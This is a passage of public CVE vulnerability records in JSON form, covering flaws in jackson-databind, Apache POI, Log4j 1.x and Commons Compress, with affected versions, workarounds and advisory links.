"https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2018-14719", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { name: "https://github.com/FasterXML/jackson-databind/issues/2097", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", refsource: "CONFIRM", url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { name: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "RHSA-2019:0782", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHSA-2019:0877", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { name: "RHBA-2019:0959", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "DSA-4452", refsource: "DEBIAN", url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", refsource: "BUGTRAQ", url: "https://seclists.org/bugtraq/2019/May/68", }, { name: "https://security.netapp.com/advisory/ntap-20190530-0003/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { name: "RHSA-2019:1782", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { name: "RHSA-2019:1797", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2804", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { name: "RHSA-2019:2858", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "RHSA-2019:3002", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "RHSA-2019:3140", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2018-14719", datePublished: "2019-01-02T18:00:00", dateReserved: "2018-07-28T00:00:00", dateUpdated: "2024-08-05T09:38:13.192Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2019-12415
Vulnerability from cvelistv5
Published
2019-10-23 19:27
Modified
2024-08-04 23:17
Severity ?
EPSS score ?
Summary
In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| n/a | Apache POI |
Version: Apache POI up to 4.1.0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T23:17:40.071Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "[tika-user] 20191105 Is tika-parsers exposed to CVE-2019-12415", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/2ac0327748de0c2b3c1c012481b79936797c711724e0b7da83cf564c%40%3Cuser.tika.apache.org%3E", }, { name: "[tika-user] 20191105 Re: Is tika-parsers exposed to CVE-2019-12415", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/895164e03a3c327449069e2fd6ced0367561878b3ae6a8ec740c2007%40%3Cuser.tika.apache.org%3E", }, { name: "[tika-user] 20191106 Re: Is tika-parsers exposed to CVE-2019-12415", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/d88b8823867033514d7ec05d66f88c70dc207604d3dcbd44fd88464c%40%3Cuser.tika.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 CVEs (vulnerabilities) that apply to Solr 8.4.1", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://lists.apache.org/thread.html/13a54b6a03369cfb418a699180ffb83bd727320b6ddfec198b9b728e%40%3Cannounce.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache POI", vendor: "n/a", versions: [ { status: "affected", version: "Apache POI up to 4.1.0", }, ], }, ], descriptions: [ { lang: "en", value: "In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.", }, ], problemTypes: [ { descriptions: [ { description: "Information Disclosure", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2021-10-20T10:38:23", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { name: "[tika-user] 20191105 Is tika-parsers exposed to CVE-2019-12415", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/2ac0327748de0c2b3c1c012481b79936797c711724e0b7da83cf564c%40%3Cuser.tika.apache.org%3E", }, { name: "[tika-user] 20191105 Re: Is tika-parsers exposed to CVE-2019-12415", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/895164e03a3c327449069e2fd6ced0367561878b3ae6a8ec740c2007%40%3Cuser.tika.apache.org%3E", }, { name: "[tika-user] 20191106 Re: Is tika-parsers exposed to CVE-2019-12415", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/d88b8823867033514d7ec05d66f88c70dc207604d3dcbd44fd88464c%40%3Cuser.tika.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 CVEs (vulnerabilities) that apply to Solr 8.4.1", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://lists.apache.org/thread.html/13a54b6a03369cfb418a699180ffb83bd727320b6ddfec198b9b728e%40%3Cannounce.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@apache.org", ID: "CVE-2019-12415", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Apache POI", version: { version_data: [ { version_value: "Apache POI up to 4.1.0", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "Information Disclosure", }, ], }, ], }, references: { reference_data: [ { name: "[tika-user] 20191105 Is tika-parsers exposed to CVE-2019-12415", refsource: "MLIST", url: "https://lists.apache.org/thread.html/2ac0327748de0c2b3c1c012481b79936797c711724e0b7da83cf564c@%3Cuser.tika.apache.org%3E", }, { name: "[tika-user] 20191105 Re: Is tika-parsers exposed to CVE-2019-12415", refsource: "MLIST", url: "https://lists.apache.org/thread.html/895164e03a3c327449069e2fd6ced0367561878b3ae6a8ec740c2007@%3Cuser.tika.apache.org%3E", }, { name: "[tika-user] 20191106 Re: Is tika-parsers exposed to CVE-2019-12415", refsource: "MLIST", url: "https://lists.apache.org/thread.html/d88b8823867033514d7ec05d66f88c70dc207604d3dcbd44fd88464c@%3Cuser.tika.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 CVEs (vulnerabilities) that apply to Solr 8.4.1", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { name: "https://lists.apache.org/thread.html/13a54b6a03369cfb418a699180ffb83bd727320b6ddfec198b9b728e@%3Cannounce.apache.org%3E", refsource: "MISC", url: "https://lists.apache.org/thread.html/13a54b6a03369cfb418a699180ffb83bd727320b6ddfec198b9b728e@%3Cannounce.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuoct2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { name: "https://www.oracle.com/security-alerts/cpuApr2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { name: "https://www.oracle.com//security-alerts/cpujul2021.html", refsource: "MISC", url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { name: "https://www.oracle.com/security-alerts/cpuoct2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2019-12415", datePublished: "2019-10-23T19:27:20", dateReserved: "2019-05-28T00:00:00", dateUpdated: "2024-08-04T23:17:40.071Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2022-23302
Vulnerability from cvelistv5
Published
2022-01-18 15:25
Modified
2024-08-03 03:36
Severity ?
EPSS score ?
Summary
JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
References
| ▼ | URL | Tags |
|---|---|---|
| https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w | x_refsource_MISC | |
| https://logging.apache.org/log4j/1.2/index.html | x_refsource_MISC | |
| http://www.openwall.com/lists/oss-security/2022/01/18/3 | mailing-list, x_refsource_MLIST | |
| https://www.oracle.com/security-alerts/cpuapr2022.html | x_refsource_MISC | |
| https://security.netapp.com/advisory/ntap-20220217-0006/ | x_refsource_CONFIRM | |
| https://www.oracle.com/security-alerts/cpujul2022.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Log4j 1.x |
Version: 1.0.1 < unspecified Version: unspecified < 2.0-alpha1 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-03T03:36:20.336Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { name: "[oss-security] 20220118 CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20220217-0006/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Log4j 1.x", vendor: "Apache Software Foundation", versions: [ { lessThan: "unspecified", status: "affected", version: "1.0.1", versionType: "custom", }, { lessThan: "2.0-alpha1", status: "affected", version: "unspecified", versionType: "custom", }, ], }, ], credits: [ { lang: "en", value: "Eduardo' Vela, Maksim Shudrak and Jacob Butler from Google.", }, ], descriptions: [ { lang: "en", value: "JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, ], metrics: [ { other: { content: { other: "high", }, type: "unknown", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-502", description: "CWE-502 Deserialization of Untrusted Data", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2022-07-25T16:49:03", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { tags: [ "x_refsource_MISC", ], url: "https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w", }, { tags: [ "x_refsource_MISC", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { name: "[oss-security] 20220118 CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20220217-0006/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], source: { discovery: "UNKNOWN", }, title: "Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", workarounds: [ { lang: "en", value: "Users should upgrade to Log4j 2 or remove usage of the JMSSink from their configurations.", }, ], x_generator: { engine: "Vulnogram 0.0.9", }, x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@apache.org", ID: "CVE-2022-23302", STATE: "PUBLIC", TITLE: "Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Apache Log4j 1.x", version: { version_data: [ { version_affected: ">=", version_value: "1.0.1", }, { version_affected: "<", version_value: "2.0-alpha1", }, ], }, }, ], }, vendor_name: "Apache Software Foundation", }, ], }, }, credit: [ { lang: "eng", value: "Eduardo' Vela, Maksim Shudrak and Jacob Butler from Google.", }, ], data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, ], }, generator: { engine: "Vulnogram 0.0.9", }, impact: [ { other: "high", }, ], problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-502 Deserialization of Untrusted Data", }, ], }, ], }, references: { reference_data: [ { name: "https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w", refsource: "MISC", url: "https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w", }, { name: "https://logging.apache.org/log4j/1.2/index.html", refsource: "MISC", url: "https://logging.apache.org/log4j/1.2/index.html", }, { name: "[oss-security] 20220118 CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", refsource: "MLIST", url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { name: "https://www.oracle.com/security-alerts/cpuapr2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { name: "https://security.netapp.com/advisory/ntap-20220217-0006/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20220217-0006/", }, { name: "https://www.oracle.com/security-alerts/cpujul2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], }, source: { discovery: "UNKNOWN", }, work_around: [ { lang: "en", value: "Users should upgrade to Log4j 2 or remove usage of the JMSSink from their configurations.", }, ], }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2022-23302", datePublished: "2022-01-18T15:25:20", dateReserved: "2022-01-16T00:00:00", dateUpdated: "2024-08-03T03:36:20.336Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2019-12402
Vulnerability from cvelistv5
Published
2019-08-29 00:00
Modified
2024-08-04 23:17
Severity ?
EPSS score ?
Summary
The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Commons Compress |
Version: 1.15 to 1.18 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T23:17:39.992Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "[creadur-commits] 20191022 [creadur-rat] branch master updated: RAT-258: Update to latest commons-compress to fix CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/54cc4e9fa6b24520135f6fa4724dfb3465bc14703c7dc7e52353a0ea%40%3Ccommits.creadur.apache.org%3E", }, { name: "FEDORA-2019-c96a8d12b0", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QLJIK2AUOZOWXR3S5XXBUNMOF3RTHTI7/", }, { name: "FEDORA-2019-da0eac1eb6", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZB3GB7YXIOUKIOQ27VTIP6KKGJJ3CKL/", }, { name: "[druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { name: "[flink-issues] 20200306 [GitHub] [flink] nielsbasjes opened a new pull request #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r5caf4fcb69d2749225391e61db7216282955204849ba94f83afe011f%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200306 [GitHub] [flink] flinkbot edited a comment on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rcc35ab6be300365de5ff9587e0479d10d7d7c79070921837e3693162%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200306 [GitHub] [flink] flinkbot commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/re13bd219dd4b651134f6357f12bd07a0344eea7518c577bbdd185265%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200310 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r5103b1c9242c0f812ac96e524344144402cbff9b6e078d1557bc7b1e%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] nielsbasjes commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r590c15cebee9b8e757e2f738127a9a71e48ede647a3044c504e050a4%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r05cf37c1e1e662e968cfece1102fcd50fe207181fdbf2c30aadfafd3%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] flinkbot edited a comment on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rdebc1830d6c09c11d5a4804ca26769dbd292d17d361c61dea50915f0%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] nielsbasjes edited a comment on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rd3f99d732baed459b425fb0a9e9e14f7843c9459b12037e4a9d753b5%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200312 [GitHub] [flink] zentol commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r21d64797914001119d2fc766b88c6da181dc2308d20f14e7a7f46117%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200312 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r233267e24519bacd0f9fb9f61a1287cb9f4bcb6e75d83f34f405c521%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200313 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r25422df9ad22fec56d9eeca3ab8bd6d66365e9f6bfe311b64730edf5%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200313 [GitHub] [flink] zentol commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r972f82d821b805d04602976a9736c01b6bf218cfe0c3f48b472db488%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200313 [GitHub] [flink] GJL closed pull request #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r4363c994c8bca033569a98da9218cc0c62bb695c1e47a98e5084e5a0%40%3Cissues.flink.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 CVEs (vulnerabilities) that apply to Solr 8.4.1", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 Re: CVEs (vulnerabilities) that apply to Solr 8.4.1", tags: [ "mailing-list", "x_transferred", ], url: 